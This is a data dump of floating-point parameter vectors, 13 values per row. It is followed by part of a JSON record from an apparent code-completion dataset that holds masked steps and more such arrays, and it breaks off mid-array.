[2.198369754018213e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7513929529124395e-10, -1.82610373802557e-15, 7.448076765658434e-16, 2.0042195789951223e-05, -1.7728642137544318e-06, -1.5013783998899997e-08, 8.734593739302048e-10, 147068576327.25705, 122027384226.92]
[2.2257852388875064e-10, -1.2059133330572482e-12, -2.090479539659853e-13, 4.9793760275117476e-11, -1.7849498396021264e-10, -1.841021101878205e-15, 7.556782953802372e-16, 2.022642042947946e-05, -1.769936435419886e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 149871632956.7388, 122750625888.09634]
[2.2152115305769157e-10, -1.2344709098355012e-12, -2.1013781830316155e-13, 5.011120217163613e-11, -1.7343044399460855e-10, -1.857281675942834e-15, 7.430575474541962e-16, 2.0343113714890682e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 151082881535.07886, 122935226427.98189]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 133427418313.38545, 131702579310.68652]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.116126459765591e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 137250169853.3863, 133211383937.09729]
[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99263, 143105235055.608]
[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69511, 143860615432.91934]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118202331336.15999, 145092770865.8836]
[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760544278271184e-10, 110377805870.9487, 155477031697.76462]
[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7281503437685213e-10, -1.82610373802557e-15, 8.836470142939426e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.63412, 158587944243.89005]
[0.0, -1.2031098015567e-12, -2.522559178506789e-13, 5.003845283040925e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.9950498914670327e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 99132279868.34593, 171185572417.85907]
[2.2257852388875064e-10, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 8.811799226535086e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.508244156181531e-08, 8.760544278271184e-10, 93130287119.72461, 180430143233.58368]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8265258253512156e-15, 7.430575474541962e-16, 2.0240988631290876e-05, -1.7728642137544318e-06, -1.5013783998899997e-08, 8.784555835692595e-10, 86927194519.4496, 183449646874.34637]
[7.863427642383715e-09, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.750599822793858e-10, 87084714365.5935, 191076754457.2524]
[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15, 7.485411998460075e-16, 1.9750639916729973e-05, -1.769936435419886e-06, -1.5013783998899997e-08, 8.825388912755251e-10, 96474604776.96465, 194275355409.06598]
[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.503739318330452e-08, 8.760544278271184e-10, 86984982238.58047, 194967876303.00238]
[1.5200576895768509e-09, -1.2059133330572482e-12, -2.0752021923147355e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.479116563110691e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.4682044872577598e-08, 8.724478065416361e-10, 82147238279.93182, 198112832281.90573]
[2.223825616669009e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7326944854292794e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.534155691698868e-08, 8.721578527250325e-10, 175522473614.0067, 115813093887.0164]
[2.2296631466270538e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 2.0431066002844864e-05, -1.7780476812466564e-06, -1.5013783998899997e-08, 8.717160979795123e-10, 146919548917.9041, 118508631814.89664]
[2.2152115305769157e-10, -1.2131115225525171e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.529126273308479e-08, 8.750599822793858e-10, 189141514324.11395, 119478476003.54858]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.515944456372276e-08, 8.735477478457909e-10, 171393648132.89902, 119746195767.88297]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.680779846505464e-10, 198413310387.34686, 120002114057.9749]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]
[2.2152115305769157e-10, -1.1981340041661674e-12, -2.0952905567462806e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.397318554179349e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.721578527250325e-10, 146191133033.73245, 124495463707.0261]
[2.220169404817274e-10, -1.2059133330572482e-12, -2.0840667223230766e-13, 5.0388416851351e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.535159731564839e-08, 8.794413360449789e-10, 153568856127.85236, 127226107362.62663]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.476241521935537e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.504298228349246e-08, 8.735477478457909e-10, 140382068840.41766, 128048566261.66084]
[-9.575357968769427e-09, -1.2140137633227375e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.747166095423015e-10, -1.842789515995345e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.761484506217259e-06, -1.520980077906525e-08, 8.721578527250325e-10, 135600496522.7375, 129146670219.88675]
[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.449634745732176e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 131821303340.10287, 132556338910.10567]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0382265280257245e-11, -1.743336316696023e-10, -1.813766783798406e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 129406444985.873, 132653030892.18918]
[2.2152115305769157e-10, -1.2071709641632366e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7480334166671461e-06, -1.520980077906525e-08, 8.721578527250325e-10, 133865099427.32999, 140436120253.29218]
[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99377, 143105235055.60883]
[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69417, 143860615432.91846]
[2.2282051950271776e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, 143868003797.30536]
[-9.575357968769427e-09, -1.2028279049571785e-12, -2.1051647732787472e-13, 5.039644867967898e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.430575474541962e-16, 1.9863936167468564e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.749223081325664e-10, 121395913545.80966, 144269444777.14786]
[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.2957, 145085114899.6645]
[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7471650977559177e-10, -1.8261648304268637e-15, 7.416691902768309e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.04602, 145085114900.12366]
[2.2082942462171206e-10, -1.2071709641632366e-12, -2.0913778067377877e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5074975460776788e-08, 8.721578527250325e-10, 109968109293.02217, 145590447784.79443]
[2.22213071071529e-10, -1.2059133330572482e-12, -2.1085309656936224e-13, 5.021867485100539e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760267738096764e-10, 111899934222.58044, 153694065180.84283]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.0866854154642685e-13, 5.011120217163613e-11, -1.766361848796505e-10, -1.8339694239958517e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760544278271184e-10, 112511385038.11157, 154263245256.49524]
[3.868816176815073e-09, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.4920809345224143e-08, 8.750599822793858e-10, 102250033424.31876, 164710456294.5225]
[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.452586179271996e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.4975512206722303e-08, 8.721578527250325e-10, 92516509687.73035, 170174200265.44513]
|
normal
|
{
"blob_id": "bdf3cb1830021b10d6c8966b3341fd9297d9a371",
"index": 2045,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n[1.5780628845471506e-10, -1.411490597458207e-12, -2.483949940281473e-13, \n 5.026488748046414e-11, -1.6612576871621329e-10, -1.6989844545344268e-15,\n 8.109443782655016e-16, 2.404048022255995e-05, -1.9859378185800262e-06, \n -1.6176901999289427e-08, 9.489903548622118e-10, 102704594939.3429, \n 145011267381.10236]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, \n 148817892429.6303]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.6265959327559024e-11, -1.669670220497726e-10, -1.7924226413310876e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.68878771600575e-08, 9.514461873186105e-10, 117267023779.58536, \n 138194745977.8172]\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.490649104258458e-13, \n 5.026488748046414e-11, -1.669670220497726e-10, -1.6989844545344268e-15,\n 8.109443782655016e-16, 2.3963751617497686e-05, -1.9859378185800262e-06,\n -1.6176901999289427e-08, 9.514461873186105e-10, 81279986793.6045, \n 148499957167.59894]\n[6.525636151737385e-10, -1.3197261044307544e-12, -2.4458923117817936e-13, \n 4.6265959327559024e-11, -1.6585443429963996e-10, -1.802849923078712e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.68878771600575e-08, 9.514461873186105e-10, 121168243931.69568, \n 138376625633.08905]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.59768924730343e-11, -1.6588127033784183e-10, -1.7924226413310876e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9859378185800262e-06,\n -1.6176901999289427e-08, 9.503282761551985e-10, 127284942067.54468, \n 147143586736.12967]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15,\n 8.4683341745183045e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, \n 148817892429.6303]\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.477506624442777e-13, \n 5.026488748046414e-11, -1.669670220497726e-10, -1.7924226413310876e-15,\n 8.070333012129768e-16, 2.4138485475672502e-05, -1.9859378185800262e-06,\n -1.6108027319186075e-08, 9.514461873186105e-10, 78167992157.7952, \n 149819556305.94864]\n[2.8389500911155237e-10, -1.3179669217824132e-12, -2.1290409882195637e-13, \n 5.0376537605765665e-11, -1.7763084077799175e-10, -\n 1.8081388431942655e-15, 8.940150894056582e-16, 2.501288034169883e-05, -\n 2.04721003e-06, -1.5842532923181598e-08, 9.632771875757591e-10, \n 108694336300.90585, 154375559012.27695]\n[3.603083193105678e-11, -1.3197261044307544e-12, -2.213785963757499e-13, \n 4.581086934703742e-11, -1.6681614728164575e-10, -1.803564324024427e-15,\n 8.4683341745183045e-16, 2.4065016435368993e-05, -2.0711260096490455e-06,\n -1.7031696163247858e-08, 1.0052651438176042e-09, 98921398930.67514, \n 195080915978.15582]\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -2.3988654320236774e-13,\n 4.877026722101481e-11, -1.4519789238682426e-10, -1.8284483886533772e-15,\n 8.688144408462996e-16, 2.7398930354457147e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.90965422552221e-10, 100727388654.51337, \n 143318140783.98648]\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.450370910345386e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.935114691513575e-10, 112772825510.86789, \n 160453198244.84198]\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, \n 4.764041880667976e-11, -1.8918518378579712e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.7122228639393258e-05, -1.8099079507631247e-06,\n -1.8203397437532012e-08, 8.935114691513575e-10, 177535436392.6114, \n 109895891048.79645]\n[-2.0926038768787875e-10, -1.6406892521440393e-12, -1.9531413192683389e-13,\n 4.85603371945204e-11, -1.450370910345386e-10, -1.9257301298903336e-15, \n 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 8.935114691513575e-10, 150364957402.63327, \n 122880053749.32047]\n[-8.223802918909379e-10, -1.4625176901480844e-12, -2.703868659848318e-13, \n 4.852404641399239e-11, -1.896863627503491e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.697391208672331e-05, -1.7223534426462784e-06, \n -1.7212440323693525e-08, 8.377481199786938e-10, 199237170018.58218, \n 130994741061.18477]\n[-2.1118416643089627e-10, -1.459747004615292e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4471230416768517e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.7267797101210102e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.935114691513575e-10, 120611068648.22205, \n 148716985588.15564]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 190052435274.9098, \n 101545825010.15762]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4446129047664535e-10, -1.8210829282495652e-15,\n 8.731899868495941e-16, 2.4857867004975476e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 195239394048.3779, \n 101879284463.33914]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.88885, \n 102270797763.39908]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, \n 106305215455.77405]\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, \n 4.7704075824842225e-11, -1.8975666267494283e-10, -\n 1.9099300746589145e-15, 8.757096667187756e-16, 2.7122228639393258e-05, \n -1.809239966469619e-06, -1.8203397437532012e-08, 8.935114691513575e-10,\n 166731944707.48343, 109962566902.69849]\n[-2.0926038768787875e-10, -1.3235354562894133e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.5027518840822802e-10, -1.9355556139972827e-15,\n 8.69779310515605e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -\n 1.830053261436748e-08, 9.113315958572542e-10, 198705325524.15018, \n 111850971687.16727]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.858844276736905e-11, -1.5027518840822802e-10, -1.9257301298903336e-15,\n 8.765174154706532e-16, 2.507247127369048e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.134614417430693e-10, 152877011534.3794, \n 128488226222.4665]\n[-8.325113652893972e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8226533446456543e-15,\n 8.718221314640016e-16, 2.471871023322042e-05, -1.788813296914756e-06, -\n 1.836034443165441e-08, 9.148927620445716e-10, 115664967416.85544, \n 172987399752.44284]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.765346456450067e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 191606485390.66824, \n 100937635343.36494]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, \n 101220474756.5564]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.4730851235460287e-10, -1.8195538935082505e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.24603, \n 101440046940.62292]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, \n 101479475091.5385]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 186125019263.05353, \n 101522685052.87083]\n[-8.372413642600907e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.826770959894538e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.675713932751666e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 176424094355.21158, \n 102059630396.96977]\n[-8.32774857282967e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.475667375214216e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7921694947468313e-06,\n -1.836034443165441e-08, 9.080472327376693e-10, 190619161162.84558, \n 102134941196.42899]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.835930442286039e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89273, \n 102270797763.3992]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9482957217087468e-13, \n 4.831070029448083e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.688144408462996e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89435, \n 102270797763.39929]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4446129047664535e-10, -1.8304219886094965e-15,\n 8.765174154706532e-16, 2.4857867004975476e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.087619653117874e-10, 191644867011.30374, \n 102518032445.5969]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.82400894161232e-11, -1.4446129047664535e-10, -1.8228595048374295e-15,\n 8.751158883884222e-16, 2.506841119647095e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 172947032775.99432, \n 102577021916.3392]\n[-2.103367158359051e-10, -1.3359785407261977e-12, -1.9376482536341035e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, \n 106305215455.77405]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8161784527844478e-08, 9.087619653117874e-10, 144963603428.97382, \n 112061347287.60056]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.5026084747023036e-05, -1.7900208911755532e-06,\n -1.830053261436748e-08, 9.087619653117874e-10, 125853468889.92097, \n 136457449593.06062]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.776082515662521e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 126137991779.33096, \n 160562679389.67618]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, \n 100125948657.42978]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.855683396544643e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 183895104728.34744, \n 101215117638.35565]\n[-2.0926038768787875e-10, -1.3382357152930057e-12, -1.9531413192683389e-13,\n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, \n 101220474756.5564]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11664, \n 101220474756.55742]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.476291648179518e-10, -1.8195538935082505e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.4617, \n 101440046940.6675]\n[-2.0969974314689316e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, \n 101479475091.5385]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.8730627003901226e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.58997, \n 101479475091.5439]\n[-2.0926038768787875e-10, -1.6370065196284276e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.4663924630161214e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.5149586855224063e-05, -1.8040587516026417e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 174674218067.03134, \n 101707557509.25955]\n[-2.0780704759852712e-10, -1.3359785407261977e-12, -1.928247479392491e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.815489945689696e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.830053261436748e-08, 9.081976758127089e-10, 177564736843.2668, \n 101910116331.42278]\n[-2.0926038768787875e-10, -1.3481496678499343e-12, -1.9612804716494087e-13,\n 4.869384519400452e-11, 